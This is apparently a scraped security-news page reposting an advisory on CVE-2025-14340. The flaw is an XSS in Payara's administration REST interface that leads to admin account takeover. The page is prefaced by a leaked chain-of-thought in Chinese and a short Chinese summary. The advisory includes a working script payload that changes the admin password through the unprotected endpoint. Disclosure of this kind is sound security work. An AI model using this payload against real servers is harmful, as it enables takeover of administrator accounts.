好的,我现在需要帮用户总结一篇文章的内容,控制在100个字以内。用户给的文章是关于Payara管理接口的一个XSS漏洞,导致管理员账户接管。首先,我得理解文章的主要内容。 文章提到,这个XSS漏洞存在于Payara的管理REST接口中,攻击者可以注入JavaScript代码,从而接管管理员账户。原因有几个:一是使用HTTP基本认证,浏览器会自动发送凭据;二是更改密码的端点不需要当前密码;三是没有CSRF保护;四是攻击者可以在特定路径注入脚本,发送POST请求修改密码。 接下来,我需要把这些关键点浓缩成一句话。要包括漏洞名称、影响、原因和后果。可能的结构是:Payara管理接口XSS漏洞导致管理员账户被接管,原因包括基本认证、密码更改端点不需当前密码、无CSRF保护等。 然后检查字数是否在100字以内,并且不要使用特定的开头词。最后确保语言简洁明了。 </think> Payara管理接口存在XSS漏洞,攻击者可利用该漏洞注入脚本,通过HTTP基本认证和无CSRF保护的密码更改端点接管管理员账户。 2026-3-26 08:56:48 Author: cxsecurity.com(查看原文) 阅读量:7 收藏
# XSS to Admin account takeover (CVE-2025-14340) A Cross-Site Scripting vulnerability in Payara’s Administration Rest Interface, allows execution of attacker-controlled JavaScript leading to admin account take over. Because of: 1. The panel uses HTTP Basic Auth (credentials are sent automatically by the browser for same-origin requests). 2. The change-admin-password endpoint does not require the current password to update a user’s password. 3. The change-admin-password form does not have CSRF protection. 4. An injected script using the XSS in `/management/domain/version` can POST to `/management/domain/change-admin-password` and set an attacker-chosen password for any target account — resulting in administrator account takeover. #### Proof of Concept URL: `https://panel.example.com:4848/management/domain/version?<PAYLOAD>` PAYLOAD: ``` <script> fetch('/management/domain/change-admin-password', { method: 'POST', headers: { 'X-Requested-By': 'GlassFish REST HTML interface', 'Accept': 'text/html', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=chang e-admin-password' }); </script> ``` ## Legal AUTHORIZED USE ONLY. DeepSecurity Perú does not endorse unauthorized access and takes no responsibility for any misuse of the information provided.
Thanks for you comment!
Your message is in quarantine 48 hours.
如有侵权请联系:admin#unsafe.sh